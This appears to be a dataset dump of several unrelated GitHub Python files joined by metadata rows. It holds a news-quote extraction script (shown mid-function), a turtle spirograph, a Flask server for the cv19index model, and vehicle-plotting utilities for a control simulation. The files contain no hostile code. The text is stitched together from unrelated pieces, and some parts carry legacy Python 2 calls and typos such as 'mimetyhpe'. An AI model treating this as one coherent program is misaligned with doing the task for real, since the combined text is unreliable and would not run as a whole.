img= soup.find_all('img')
img2= soup.find_all('meta')
allQuotes=[]
allSen = []
merge=[]
mergeComma=[]
proper=[]
for para in paras:
"""
cl = para.get('class')
if 'tweet' in str(cl).lower():
continue
""" # filters tweets
text=para.get_text()
web= para.find_all('webonly')
if web:
for w in web:
s=w.string
i=text.find(s)
text1= text[:i]
text2= text[i+len(s):]
text=text1+text2
text.encode('utf-8')
sentences= []
quotes= []
properStart=0
capC=0;
lastBegin=0 #tracks where the last sentence began
nextBegin=0 # tracks where the next sentence will begin, set when ending punctuation is found
lastSpace=0
inQuote= False
quoteStart = 0
lastCap=0 # last capitol symbol (ASCII only)
spaceQ=0 # number of spaces in a quote
wasQ= False # was there a quote in the last sentence (not if the qutoe ended it)
hadQ=False # did the last sentence have a quote
mightMer=False #If the quote should be merged witht the previous one
mergeC=False
for i in range(len(text)):
if i == nextBegin: # sets the start of a new sentence
lastBegin=i
c=text[i]
if c in punctuation and c!="'":
if capC>1:
proper.append(text[properStart:i])
capC=0
if c== " ":
lastSpace=i
if inQuote:
spaceQ+=1
elif c=="." and (text[lastSpace+1:i].lower() in prefixes or i-lastCap<4 or i-lastSpace<2):
# all the cases for when a period doesn't end a sentence
do=0
#continue
elif c== "." or c=="!" or c=="?" or c==";": # end of a sentence
j=i
while j<len(text) and text[j] in punctuation:
j+=1
s = text[lastBegin:j]
sentences.append(s)
nextBegin= j+1
if capC>1:
proper.append(text[properStart:i])
capC=0
#print str(hadQ)+"-----"
hadQ=False
if wasQ:
hadQ=True
wasQ=False
elif c == "\"": # Ascii quote, toggles whether or not to be in a quote
if inQuote:
q= text[quoteStart:i+1]
#print str(quoteStart)+ " - ascii end"
inQuote=False
if spaceQ>3:
if mightMer:
place=len(quotes)+len(allQuotes)
merge.append(place)
if mergeC:
mergeComma.append(place)
quotes.append(q)
spaceQ=0
if not (nextBegin>i):
wasQ=True
mightMer=False
mergeC= False
else:
inQuote=True
quoteStart=i
#print str(quoteStart)+" - " +str(lastBegin)+" // "+ str(hadQ)
if quoteStart-lastBegin<2 and hadQ:
mightMer=True
elif wasQ:
mightMer=True
mergeC=True
elif c==u'\u201c': #unicode quote begin
inQuote=True
quoteStart=i
#print str(quoteStart)+" - " +str(lastBegin)+" // "+ str(hadQ)
if quoteStart-lastBegin<2 and hadQ:
mightMer=True
elif wasQ:
mightMer=True
mergeC=True
elif c==u'\u201d': # unicode quote end
q= text[quoteStart:i+1]
#print str(quoteStart)+ " - ascii end"
inQuote=False
if spaceQ>3: # quote has 4 or more words
if mightMer:
place=len(quotes)+len(allQuotes)
merge.append(place)
if mergeC:
mergeComma.append(place)
quotes.append(q)
spaceQ=0
if not (nextBegin>i):
wasQ=True
mightMer=False
mergeC=False
elif ord(c)>64 and ord(c)<91: # CAPITOL LETTER
lastCap = i
if capC==0:
properStart=i
capC+=1
elif i-lastSpace<=1:
if capC>1:
proper.append(text[properStart:i-1])
capC=0
#pp.pprint(quotes)
if len(quotes)>=1:
allQuotes+=quotes
if len(sentences)>=1:
allSen+=sentences
#pp.pprint(sentences)
#print merge
for i in merge: #merge is a list of indecies where the qutoe at i must merge witht he one at i-1
q1=allQuotes[i-1]
q2=allQuotes[i]
punc=q1[len(q1)-2]
q1=q1[:len(q1)-2]
if punc == "," and i not in mergeComma: #in the case "quote, " i said, "end of quote." / the comma shouldnt be replaced
punc= "."
qFin= q1 +punc+ " "+ q2[1:]
allQuotes[i-1]=qFin
mod=0
for i in merge:
allQuotes.pop(i+mod)
mod-=1
properU=[]
for line in proper:
if line not in properU:
properU.append(line) # a list of unique proper names, unused for now
tempQuotes= []
for quote in allQuotes:
ascii=ord(quote[1])
if ascii>64 and ascii<91:
i=len(quote)-1
while quote[i] in punctuation:
i-=1
#i+=1
if quote[i]==",":
quote= quote[:i]+"."+quote[i+1:]
tempQuotes.append(quote)
allQuotes=tempQuotes
"""
blockQuote= soup.find_all(attrs={ "class" : "pullquote" }) # pull block quotes -----NOT WORKING-----
for line in blockQuote:
allQuotes.push(line.get_text())
"""
""""
Errors with this algorithm:
-If you use a while loop it will exit as soon as you find one quote that
doesnt meet your criteria, and you wont check all quotes.
Also I think you have the lengths backward; should be ...<180 and ... >80.
if len(allQuotes)>0:
while len(allQuotes[0])>180: #max quote size
allQuotes=allQuotes[1:]
allQuotes.reverse()
while len(allQuotes[0])<80: # min quote size
allQuotes=allQuotes[1:]
allQuotes.reverse()"""
numQuotes=6
goodSen=[]
blocks=[]
blockQuote= soup.find_all('blockquote') # pull block quotes
for line in blockQuote:
if 'tweet' not in str(line.get('class')).lower():
blocks.append(line.get_text())
#pp.pprint(blocks)
blocks= trim(blocks, 165,80)
blocks.sort(key= lambda q:score(q), reverse=True)
remain =numQuotes-len(blocks)
if remain<=0:
goodSen= blocks[:numQuotes]
else:
goodSen+= blocks
#print goodSen
#print allQuotes
allQuotes= trim(allQuotes,165, 80)
allQuotes.sort(key= lambda q:score(q), reverse=True)
for q in allQuotes:
if q not in goodSen and len(goodSen)< numQuotes:
goodSen.append(q)
remain2= numQuotes- len(goodSen)
#print goodSen
#print remain2
if remain2<=0:
#goodSen+= allQuotes[:remain]
do=0
else:
#goodSen+= allQuotes
#
# Future Pan: Make it able to combine sentences instead of trimming...
#
#print allSen
allSen = trim(allSen,165,80)
allSen.sort(key= lambda q:score(q), reverse=True)
#print allSen
for s in allSen:
if s not in goodSen:
goodSen.append(s)
if len(goodSen) >= numQuotes:
break
#for i in range(len(allQuotes)):
# q=allQuotes[i]
# q+=str(len(q))
# allQuotes[i]=q
#pp.pprint(properU)
origin=multiSplit(argv)
if 'com' in origin: #find the hostname of the website
source= origin[origin.index('com')-1]
images= []
# old image finding code, to be updated
stri=""
for i in img:
stri=i.get('src')
#print(str)
pieces= multiSplit(stri)
#if source in pieces and 'logo' not in pieces and 'png' not in pieces and 'gif' not in pieces and stri != None:
if 'logo' not in pieces and 'png' not in pieces and 'gif' not in pieces and stri != None and stri[:3] == 'htt': #filter by source string
#pp.pprint(stri)
fileSize, dims=getsizes(stri)
if dims==None:
continue
width, height= dims
#w, h =jpeg_res(stri)
if width>200 and height>200: # filter by image size
good=True
for p in i.parents: # filtering by the parents of the image
i = str(p.get('id'))
c= str(p.get('class'))
d= str(p.get('data-content-kicker'))
if 'related' in i:
good=False
break
elif 'wide-thumb' in c:
good= False
break
elif 'google_' in i:
good= False
break
elif 'moat_trackable' in c:
good= False
break
elif 'Related' in d:
good= False
break
elif 'extra' in c:
good= False
break
if good:
images.append(stri)
#pp.pprint(str(w)+ "/"+str(H)+ " - "+ stri)
#pp.pprint(source)
#pp.pprint(images)
content=''
for i in img2:
prop=i.get('property')
if prop=="og:image":
content= i.get('content') # supposed to be a guarenteed good image for every article 'technically'
break
heads = soup.find_all('h1')
head = ''
if heads!=[]:
for h in heads:
#print h;
if "logo" not in str(h.get('class')):
head = h.get_text()
break
#pp.pprint(head)
return goodSen,content, images, head
def score(s):
score=0
j=s.lower()
for p in punctuation:
j=j.replace(p, ' ')
l=j.split()
for w in l:
if w in repository.emotive:
score+=2
if w in repository.personal:
score+=3
for w in repository.proper:
if w in j:
score+=1
for w in repository.phrase:
if w in j:
score+=1
score+= s.count('\"')
score+= s.count(u"\u201C")
score+= s.count(u"\u201D")
return score
def trim(sentences, max, min):
tempQuotes = []
if len(sentences)>0:
for quote in sentences:
length = len(quote);
if length >min and length <max:
tempQuotes.append(quote)
return tempQuotes
def multiSplit(string):
if not string:
return []
seperated= string.replace('/',' ').replace('.', ' ').replace('_', ' ').replace('&', ' ').split()
return seperated
import urllib
from PIL import ImageFile
def getsizes(uri):
# get file size *and* image size (None if not known)
file = urllib.urlopen(uri)
size = file.headers.get("content-length")
if size: size = int(size)
p = ImageFile.Parser()
while 1:
data = file.read(1024)
if not data:
break
p.feed(data)
if p.image:
return size, p.image.size
break
file.close()
return size, None
#parse('http://www.huffingtonpost.com/entry/david-cameron-dodgy_us_570bf446e4b0885fb50dc004')
#parse('http://www.huffingtonpost.com/entry/ted-cruz-gold-standard-republican_us_571196bfe4b06f35cb6fbac6?cps=gravity_2425_-8385480002285021224')
#parse('http://www.theblaze.com/stories/2016/04/12/trump-blasts-rnc-chairman-reince-priebus-should-be-ashamed-of-himself/') | NUKnightLab/piquote | quote.py | quote.py | py | 13,487 | python | en | code | 3 | github-code | 13 |
41047993355 | from turtle import *
from random import *
def random_color():
r = randint(0, 255)
g = randint(0, 255)
b = randint(0, 255)
color = (r, g, b)
return color
def draw_spirograph(turtle, size_of_gap, r):
for i in range(int(360 / size_of_gap)):
tim.color(random_color())
tim.circle(r)
tim.setheading(tim.heading() + size_of_gap)
tim = Turtle()
colormode(255)
tim.speed(0)
tim.pensize(2)
draw_spirograph(tim, 5, 100)
my_screen = Screen()
my_screen.exitonclick() | codeBeaver2002/circleDraw | main.py | main.py | py | 510 | python | en | code | 0 | github-code | 13 |
23046903209 | import tempfile
import time
import pandas as pd
import numpy as np
from pkg_resources import resource_filename
from flask import Flask, make_response, request, abort
from .predict import do_run
from .io import read_model
def create_model_app(model_fpath, schema_fpath, **kwargs):
model = read_model(model_fpath)
app = Flask(__name__)
@app.route("/ping", methods=("GET",))
def ping():
return make_response("")
@app.route("/invocations", methods=("POST",))
def invocations():
start = time.time()
with tempfile.NamedTemporaryFile(suffix=".csv") as input_fobj:
input_fpath = input_fobj.name
input_fobj.write(request.data)
input_fobj.seek(0)
with tempfile.NamedTemporaryFile(suffix=".csv") as output_fobj:
output_fpath = output_fobj.name
try:
do_run(input_fpath, schema_fpath, model_fpath, output_fpath)
except Exception as e:
abort(400, f"Error parsing payload: {e}")
output_fobj.seek(0)
results = output_fobj.read()
response = make_response(results)
response.mimetyhpe = "text/csv"
return response
return app
def sagemaker_serve():
app = create_model_app(
resource_filename("cv19index", "resources/xgboost/model.pickle"),
resource_filename("cv19index", "resources/xgboost/input.csv.schema.json"),
)
app.run("0.0.0.0", 8080, debug=False)
| closedloop-ai/cv19index | cv19index/server.py | server.py | py | 1,545 | python | en | code | 90 | github-code | 13 |
15629333223 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
from matplotlib.ticker import MaxNLocator
import imageio
import os
MAX_ITER = 3 # Max iteration
DU_TH = 0.1 # iteration finish param
GOAL_DIS_X = 1.0 # goal distance
GOAL_DIS_Y = 1.0 # goal distance
STOP_SPEED = 2.0 # stop speed
MAX_TIME = 500.0 # max simulation time
TARGET_SPEED = 15.0 # [m/s] target speed
N_IND_SEARCH = 20 # Search index number
DESIRED_Y = -5.0
DESIRED_X = 1000.0
DT = 0.1 # [s] time tick
# Vehicle parameters
LENGTH = 4.4 # [m]
WIDTH = 1.9 # [m]
BACKTOWHEEL = 0.9 # [m]
WHEEL_LEN = 0.3 # [m]
WHEEL_WIDTH = 0.2 # [m]
TREAD = 0.7 # [m]
WB = 1.9 # [m]
def plot_car(x, y, yaw, steer=0.0, cabcolor="-r", truckcolor="-k"):
outline = np.matrix([[-BACKTOWHEEL, (LENGTH - BACKTOWHEEL), (LENGTH - BACKTOWHEEL), -BACKTOWHEEL, -BACKTOWHEEL],
[WIDTH / 2, WIDTH / 2, -WIDTH / 2, -WIDTH / 2, WIDTH / 2]])
fr_wheel = np.matrix([[WHEEL_LEN, -WHEEL_LEN, -WHEEL_LEN, WHEEL_LEN, WHEEL_LEN],
[-WHEEL_WIDTH - TREAD, -WHEEL_WIDTH - TREAD, WHEEL_WIDTH - TREAD, WHEEL_WIDTH - TREAD, -WHEEL_WIDTH - TREAD]])
rr_wheel = np.copy(fr_wheel)
fl_wheel = np.copy(fr_wheel)
fl_wheel[1, :] *= -1
rl_wheel = np.copy(rr_wheel)
rl_wheel[1, :] *= -1
Rot1 = np.matrix([[math.cos(yaw), math.sin(yaw)],
[-math.sin(yaw), math.cos(yaw)]])
Rot2 = np.matrix([[math.cos(steer), math.sin(steer)],
[-math.sin(steer), math.cos(steer)]])
fr_wheel = (fr_wheel.T * Rot2).T
fl_wheel = (fl_wheel.T * Rot2).T
fr_wheel[0, :] += WB
fl_wheel[0, :] += WB
fr_wheel = (fr_wheel.T * Rot1).T
fl_wheel = (fl_wheel.T * Rot1).T
outline = (outline.T * Rot1).T
rr_wheel = (rr_wheel.T * Rot1).T
rl_wheel = (rl_wheel.T * Rot1).T
outline[0, :] += x
outline[1, :] += y
fr_wheel[0, :] += x
fr_wheel[1, :] += y
rr_wheel[0, :] += x
rr_wheel[1, :] += y
fl_wheel[0, :] += x
fl_wheel[1, :] += y
rl_wheel[0, :] += x
rl_wheel[1, :] += y
plt.plot(np.array(outline[0, :]).flatten(),
np.array(outline[1, :]).flatten(), truckcolor)
plt.plot(np.array(fr_wheel[0, :]).flatten(),
np.array(fr_wheel[1, :]).flatten(), truckcolor)
plt.plot(np.array(rr_wheel[0, :]).flatten(),
np.array(rr_wheel[1, :]).flatten(), truckcolor)
plt.plot(np.array(fl_wheel[0, :]).flatten(),
np.array(fl_wheel[1, :]).flatten(), truckcolor)
plt.plot(np.array(rl_wheel[0, :]).flatten(),
np.array(rl_wheel[1, :]).flatten(), truckcolor)
# plt.plot(x, y, "*")
def check_goal(ugv, desired_x, desired_y):
dx = desired_x - ugv.x
dy = desired_y - ugv.y
if (dx <= GOAL_DIS_X):
isgoal_x = True
else:
isgoal_x = False
if (dy <= GOAL_DIS_Y):
isgoal_y = True
else:
isgoal_y = False
if isgoal_x and isgoal_y :
return True
return False
def get_nparray_from_matrix(x):
return np.array(x).flatten()
def png_count(addr):
path = addr
files = os.listdir(path)
num_png = -1
for file in files:
if file.endswith(".png"):
num_png = num_png + 1
return num_png
def animation_generation(addr,now_time):
pic_num = png_count(addr)
with imageio.get_writer(uri=addr+'\\{}.gif'.format(now_time), mode='I', fps=15) as writer:
for i in range(pic_num):
writer.append_data(imageio.imread((addr + "\\{}.png").format(i)))
def Fig_delete(addr):
path = addr
for root, dirs, files in os.walk(path):
for name in files:
if name.endswith(".png"):
os.remove(os.path.join(root, name))
print("Delete File: " + os.path.join(root, name))
def draw_fig(dirpath,delta_list,variable_name,unit_name):
length = len(delta_list)
t_list = np.zeros(length)
for i in range(length):
t_list[i] = 0.1*i
fig, ax = plt.subplots(figsize=(17,6))
plt.gca().yaxis.set_major_locator(MaxNLocator(integer=True))
font = {'family': 'Times New Roman',
'size': 13,
}
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
plt.plot(t_list,delta_list,c="orange",linewidth =4.0)
plt.tick_params(width=0.5, labelsize=20)
plt.xlabel('Time(s)',fontdict=font,fontsize =26)
if variable_name == "delta":
plt.ylabel('$\{}$ ({})'.format(variable_name,unit_name),fontdict=font,fontsize =24)
elif variable_name == "V":
plt.ylabel('${}$ ({})'.format(variable_name,unit_name),fontdict=font,fontsize =24)
else:
plt.ylabel('{}'.format(variable_name),fontdict=font,fontsize =24)
legend = plt.legend(["Normal Scenario"])
plt.legend(["Normal Scenario"],loc="upper right")
plt.rcParams.update({'font.size':21})
plt.savefig(dirpath+"\{}.png".format(variable_name),dpi=600)
plt.savefig(dirpath+"\{}.svg".format(variable_name),dpi=600)
plt.show()
def initial_excel(dir,num1,num2):
df_k = pd.DataFrame({"{}".format(num2):[]})
df_k.to_excel(dir+"//LAS_{}_{}.xlsx".format(num1,num2))
def save_to_excel(dir,Time_dict,label):
value_list = []
for key,value in Time_dict.items():
value_list.append(value)
df = pd.read_excel(dir)
df = df[["{}".format(label)]]
if label == "500":
df.loc[len(df),"500"] = value_list[-1]
elif label == "800":
df.loc[len(df),"800"] = value_list[-1]
df.to_excel(dir)
| YimingShu-teay/Safety-critical-Decision-making-and-Control | code/utils.py | utils.py | py | 5,597 | python | en | code | 2 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.